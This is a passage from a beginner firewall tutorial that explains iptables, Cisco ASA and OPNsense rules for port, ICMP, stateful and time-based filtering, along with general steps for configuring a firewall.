  • Implementation Explanation: We covered sudo iptables -A INPUT and -j ACCEPT above. The -p tcp means that this rule applies to the protocol (-p) of TCP, with a destination port (--dport) of 443. && just allows us to put two Linux commands on one line. The only difference in the second command is that we're making a rule to allow outbound traffic as well as inbound traffic (-A OUTPUT).

Protocol-Specific Rules

  • Example Rule: Allow ICMP (Internet Control Message Protocol) for internal network devices only.
  • Use Case: Useful for allowing internal network testing and diagnostics while blocking potential external pings or other ICMP-based attacks.
  • Simple Implementation: sudo iptables -A INPUT -s 192.168.1.0/24 -p icmp -j ACCEPT && sudo iptables -A INPUT -p icmp -j DROP
  • Implementation Explanation: In this case, our source (-s) is given as a subnet. You'd put whatever subnet represents your internal network (this is a shorthand way to represent every possible IP address that can exist on a network). The protocol (-p) is icmp and we will jump (-j) to ACCEPT. Again, we && the two commands together and then create another rule that drops all other ICMP packets. It is important that these rules are added in this order, or else the broad DROP will match first before the limited ACCEPT rule is ever considered (see the ordering sketch just after this list).
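
Because appended (-A) rules are evaluated top to bottom, iptables also has -I to insert a rule at a specific position if you got the order wrong; a quick sketch:

# Oops, the DROP went in first; insert the ACCEPT above it at position 1
sudo iptables -I INPUT 1 -s 192.168.1.0/24 -p icmp -j ACCEPT
# Confirm the final ordering
sudo iptables -L INPUT -n --line-numbers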

Stateful Inspection Rules

  • Example Rule: Allow outgoing traffic on any port but restrict incoming traffic to responses to established connections only.
  • Use Case: This is common for businesses that want to ensure outbound traffic is unobstructed while maintaining tight control over incoming requests.
  • Simple Implementation: access-list YOUR_ACL_NAME extended permit tcp any any established
  • Implementation Explanation: This rule is for a Cisco ASA, which has stateful firewall capabilities. It assumes you already have an access list (here represented by YOUR_ACL_NAME) that you address by name, and extended (rather than standard) means the list can filter traffic on multiple criteria. In this case, we are allowing (permit) tcp traffic from any address to any address, as long as the connection was already established. (For an iptables take on the same idea, see the sketch after this list.)
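
For comparison, iptables can express the same stateful idea with its connection-tracking module; a minimal sketch:

# Allow replies to connections we initiated, then drop unsolicited inbound TCP
sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A INPUT -p tcp -j DROP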

Time-Based Rules

  • Example Rule: Blocking all inbound traffic during non-business hours.
  • Use Case: For organizations that want to limit access during off-hours for security purposes.
  • Simple Implementation: It's complicated 😉
  • Implementation Explanation: There are a few ways to do this. One way is to run cron jobs (scheduled jobs) on your Linux server that add and remove iptables rules at the appropriate times (sketched after this list). Other firewalls, like pfSense Plus and OPNsense, make it easy through an interface. Here are the steps to do this in OPNsense:
    1. Define a Schedule: First, go to “Firewall” then “Schedules” in OPNsense. Create a new schedule and define the time periods (8 am to 5 pm) and the days of the week (Monday to Friday).
    2. Create Firewall Rule: Next, create a firewall rule under “Firewall” > “Rules” and select the interface where the rule should apply. Configure the rule to match your desired traffic (e.g., set the action to “Pass” for allowing traffic).
    3. Apply the Schedule to the Rule: In the rule settings, you will find an option to apply the schedule. Select the schedule you created in the first step.
    4. Activate and Test the Rule: After saving the rule, it will become active according to the schedule. It's important to test the rule to ensure it behaves as expected during the specified times.
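
And here is roughly what the cron approach mentioned above could look like; a sketch that assumes you want to block inbound HTTPS outside of business hours on weekdays:

# /etc/crontab entries (minute hour day-of-month month day-of-week user command)
# At 5 pm on weekdays, start dropping inbound HTTPS
0 17 * * 1-5 root iptables -A INPUT -p tcp --dport 443 -j DROP
# At 8 am on weekdays, remove that rule again
0 8 * * 1-5 root iptables -D INPUT -p tcp --dport 443 -j DROP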

Configuring Your Firewall

Applying rules in a firewall is often very easy. You can see that the commands aren't very long, and UIs can make even complex rules creatable in a minute. However, defining and configuring your firewall rules correctly is very complicated. It is important that the rules are applied in the right order ("deny all traffic" needs to be the last rule applied, after the few approvals that you add for traffic you want, for instance). It is also important that your rules fit your business and your needs. Certain companies might need to allow traffic over port 22 (SSH). Some of those companies might allow open connections to the port, while others might "IP whitelist" and only allow certain locations to connect. Some companies might allow the default RDP port of 3389, while companies that have no Windows Servers would never need that port opened. The team defining these setups must understand the entire organization's needs in order to lock the network down correctly. It is a razor's edge: too strict and the company can't function effectively; too permissive and the company could be vulnerable to intrusion by threat actors. But here is the 30,000-foot view of the steps that the team would undertake to configure a firewall.

  1. Identifying Network Requirements: Understanding what services and traffic are necessary for your network.
  2. Defining Clear Security Policies: Knowing what your organization’s security policies are in terms of what should be allowed or blocked.
  3. Implementing and Testing Rules: Gradually implementing rules and testing them to ensure they don't disrupt legitimate traffic.
  4. Regular Updates and Monitoring: Keeping the firewall rules updated according to the evolving network needs and security landscape.

Whew, that's a lot. If you're new to this entire idea and reading this from a beginner's point of view, I hope that I didn't make this super confusing. I am hoping that by seeing these scenarios and beginning to "think in firewall logic", you'll more fully understand the roles that firewalls play and how someone would begin to think about setting them up. It definitely has more in common with "who can come into my clubhouse?" than with stupid scenes in movies where characters say ridiculous things like "our firewall is at 19%".